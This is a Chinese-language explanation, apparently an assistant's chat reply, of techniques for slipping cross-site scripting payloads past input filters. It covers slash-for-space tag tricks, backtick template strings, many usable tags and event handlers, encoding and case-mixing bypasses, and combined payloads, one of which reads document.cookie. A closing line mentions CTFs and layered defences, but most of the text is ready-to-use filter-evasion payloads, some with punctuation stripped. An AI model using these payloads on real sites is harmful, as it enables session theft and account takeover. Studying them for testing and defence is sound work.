你提到的“/”和“ES6”是绕过滤器的特殊技巧我来逐一说明1. 标签名后的/代替空格这是绕过标签名检测的技巧有些过滤器检测标签是否以标签名␣开头用script/或img/代替script␣可绕过简单正则示例script/srcxss.js会被某些系统误认为标签未结束2. ES6 模板字符串绕过引号检测这是绕过属性值引号检测的技巧过滤器常检测onclickjavascript:...中的双引号用反引号包裹javascript:alert(1)示例svg onloadalert\1\可绕过简单引号匹配3. 可用标签和事件处理器可用标签除了 script/img/error 等1. SVG 相关 - svg animate set foreignObject 2. HTML5 新标签 - details ontogglepayload - select onfocuspayload - video onplaypayload 3. 传统标签 - body onloadpayload - input onfocuspayload - textarea onselectpayload - marquee onstartpayload - iframe onloadpayload 4. 自闭合标签 - link hrefjavascript:payload - meta http-equivrefresh content0;urljavascript:payload可用事件处理器鼠标事件onclick, onmouseover, onmousedown 焦点事件onfocus, onblur, onfocusin 加载事件onload, onpageshow, onbeforeunload 表单事件onchange, onselect, onsubmit 键盘事件onkeydown, onkeypress, onkeyup 其他onresize, onscroll, ontoggle4. 其他绕过技巧Unicode 编码\u0061lert(1)→alert(1)HTML 实体编码#x61;lert(1)换行符绕过a hrefjavascript:alert(1)大小写混合ScRiPtalert(1)/sCrIpT空字符script\x00alert(1)/script示例组合攻击!-- 使用 / 代替空格 -- svg/onloadalert1 !-- ES6 模板字符串 -- button onclickalertdocument.cookie点击/button !-- 使用不常见的标签和事件 -- details ontoggleconfirm(1) select onfocusalert(1) autofocus这些技巧常用于XSS跨站脚本攻击的构造在安全测试和CTF比赛中常见。实际防护需要多层过滤包括输入验证、输出编码、CSP策略等。